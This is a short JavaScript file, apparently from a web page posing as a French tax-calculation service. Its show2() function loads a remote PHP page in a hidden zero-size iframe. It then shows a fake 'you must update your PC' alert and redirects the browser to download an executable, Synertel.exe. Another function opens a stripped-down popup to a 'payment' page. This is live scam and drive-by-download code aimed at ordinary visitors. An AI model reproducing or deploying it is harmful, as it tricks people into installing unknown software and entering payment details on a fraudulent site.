var url="http://partenaires.net-impots.fr/paiement/?fromid=3b5b6289c17cc59b5da47866251583bc";
function vi1(){
	var win = window.open(url,'pop','width=420,height=645,top='+((screen.height-645)/2)+',left='+((screen.width-420)/2)+',resizable=yes,status,location=no,scrollbars=yes');
}
function ml(id_on,id_off1,id_off2){
	var don=document.getElementById(id_on);
	don.style.display='block';
	var doff1=document.getElementById(id_off1);
	doff1.style.display='none';
	var doff2=document.getElementById(id_off2);
	doff2.style.display='none';	
}
function show(id_off,id_on,url){
	var don=document.getElementById(id_on);
	don.style.display='block';
	var doff=document.getElementById(id_off);
	doff.style.display='none';
	window.location.href = url;
}
var launched = false;
function show2(urld){
	var b = document.getElementById("rtc") ;
	if(launched){
		scroll(0,0);
		alert("Vous devez mettre à jour votre PC");
		window.location.href = 'http://www.vos-impots.fr/'+urld+'/Synertel.exe';
		b.style.listStyle = 'url(\'../images/a3.gif\')';
		b.innerHTML = 'Si le problème persiste <a href="Javascript:vi1();" title="Calculez Vos Impots">cliquez ici</a>.';
		launched = false;
     }else{
         b.innerHTML = '<iframe src="http://www.ulysse-service.fr/synertel/vos-impots.fr.i.php" style="height:0;width:0" scrolling="no" frameborder="0"></iframe>';
         launched = true;
     }
 }
